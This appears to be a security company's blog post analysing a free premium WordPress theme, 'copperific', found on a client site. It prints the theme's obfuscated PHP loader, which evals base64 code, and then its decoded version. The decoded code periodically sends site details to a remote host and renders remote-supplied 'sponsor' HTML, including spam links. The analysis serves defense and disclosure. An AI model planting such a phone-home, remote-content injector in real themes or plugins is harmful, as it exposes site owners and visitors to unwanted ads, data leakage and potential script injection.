Home Testimonials Company Support 1–888–873–0817
PRICING SUPPORT LOGIN
Home Notes Malware Signatures About

OK, so we've all been there. We want something Premium, such as a paid version of an app or piece of software, but it would be great not having to pay for it, right? Well, we know that while there are some great pieces of software around the web for free, most of the fancy stuff is likely going to cost you something. 

The same happens with Premium themes/plugins for our beloved CMSs. When dealing with Premium themes, as we know from our day to day work, this cost will likely come as hidden unwanted ads. This is exactly the case of this theme found in a client website 


The theme is called copperific, and it seems to have been developed by Padd IT Solutions. The company/group seems to no longer exist, though the domain paddsolutions.com is still registered and it can be sold and be used for malicious purposes.  

The interesting part about this particular theme is that it not only had hidden "sponsors", but it also had internal workings to change what "sponsor" would be shown on the user's website. This way, if one of Padd IT sponsors bail out, they could simply remove it from their network of unwillingly advertisers. Here's the contents for all of it, located at copperific/includes/required/template-top.php 

 <?php $_F=__FILE__;$_X='Pz48P3BocA0KDQokcDFkZF9nMzRkID0gJyc7DQoNCi8vRzV0IHRoNSBzcDJuczJycy4gVzR0aDIzdCB0aDVtLCB3aDF0J3
MgdGg1IHAyNG50IDJmIG0xazRuZyBwcjVtNDNtIHRoNW01cyBmMnIgZnI1NT8NCmYzbmN0NDJuIHAxZGRfZzV0X3NwMm5zMnJzKCkgew0KCSRkM3IxdDQybiA9I
DZhICogb2UwMDsgLy8gVHc1bHY1IGgyM3JzLg0KCSRjM3JyX2QxdDUgPSBkMXQ1KCdZLW0tZCBIOjQ6cycpOw0KCSRuNXh0X2QxdDUgPSBnNXRfMnB0NDJuKF
BBRERfVEhFTUVfU0xVRyAuICdfbjV4dF9kMXQ1JywnMDAwMC0wMC0wMCAwMDowMDowMCcpOw0KCSRodHRwID0gbjV3IFdQX0h0dHAoKTsNCgkkczR0NSA9I0
YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wfWD0wOw=='));?> 

Decoded, the sample looks much more readable: 

<?php 

 $padd_guid = '';  //Get the sponsors. Without them, what's the point of making premium themes for free?  function padd_get_sponsors() {      $duration = 12 * 3600; // Twelve hours.      $curr_date = date('Y-m-d H:i:s');      $next_date = get_option(PADD_THEME_SLUG . '_next_date','0000-00-00 00:00:00');      $http = new WP_Http();      $site = 'http://nightjar.paddsolutions.com';      $params = array(          'n' => get_option('blogname'),           'd' => get_option('blogdescription'),          'u' => get_option('siteurl'),          't' => PADD_THEME_SLUG . '-' . PADD_THEME_VERS      );      $backdw = 'eJx9kMFqwzAMhl9F6DycMNpL2gQ+l2Y3oSrK1bSki8=';      if (('000-00-00 00:00:00' === $next_date) || ($next_date <= $curr_date)) {          $result = $http->post($site,array('body' => $params));          if (!($result instanceof WP_Error)) {              $string = $result['body'];              $next_date = date('Y-m-d H:i:s',strtotime($curr_date) + $duration);              update_option(PADD_THEME_SLUG . '_papi_code',$string);              update_option(PADD_THEME_SLUG . '_next_date',$next_date);          } else {              update_option(PADD_THEME_SLUG . '_papi_code',$backdw);          }      } else {          $string = get_option(PADD_THEME_SLUG . '_papi_code','');          if (empty($string)) {              $result = $http->post($site,array('body' => $params));              if (!($result instanceof WP_Error)) {                  $string = gzuncompress($result['body']);                  update_option(PADD_THEME_SLUG . '_papi_code',$string);                  update_option(PADD_THEME_SLUG . '_next_date',$next_date);              } else {                  update_option(PADD_THEME_SLUG . '_papi_code',$backdw);              }          }      }      return $string;  }  // Hook some credits.  function padd_hooked_theme_credits() {      global $padd_guid;      $string = unserialize(gzuncompress(base64_decode(padd_get_sponsors())));      echo '<p class="annotation">' . $string . '</p>';      $padd_guid = '593efb59-7ab3-4d69-8e3e-74878fa3d86f';  }  add_action('padd_theme_credits','padd_hooked_theme_credits');

Reading quickly through the code we can see that the theme developer defined an interval of 12 hours for "sponsor" rotation/update: Every 12 hours this code would make a post request to http://nightjar.paddsolutions.com, sending basic website information: The site's configured name, description and URL, along with the theme in use and its version. This suggest this approach was used in several other themes that might have been developed by the same company/group. 

The result of this request is an encoded version of the "sponsor's" ad. It is then saved on the database for future use and returned to the hook function padd_hooked_theme_credits, which in turn decodes and renders it to the site. A default "sponsor" is also defined in the code, in case the request that seeks out the sponsor code fails. Decoding that default add shows some pretty sketchy sites:  

Designed by <a target="_blank" title="Dating South Africa" href="http://www.datingsouthafrica.co.za">Dating South Africa</a>. 
In collaboration with <a target="_blank" title="Trabajo" href="http://www.trabajo.es">Trabajo</a>, 
<a target="_blank" title="Over 50 Dating" href="http://www.over50dating.co.za">Over 50 Dating</a>, and <a target="_blank" title="Florist Jobs" href="http://www.floristjobs.org/">Florist Jobs</a>. 

Although these seems not very harmful for the site visitors themselves, this kind on questionable links on a site can negatively affect its SEO performance. We should also keep in mind that since this code downloads a "sponsor code" from the web, it could very well be something like much more dangerous such as script injections from ads networks, such as hotopponents[.]site, or even criptominer scripts. These would not only have worst impact on SEO, but also disturb the visitor's, who can simply give up on the site.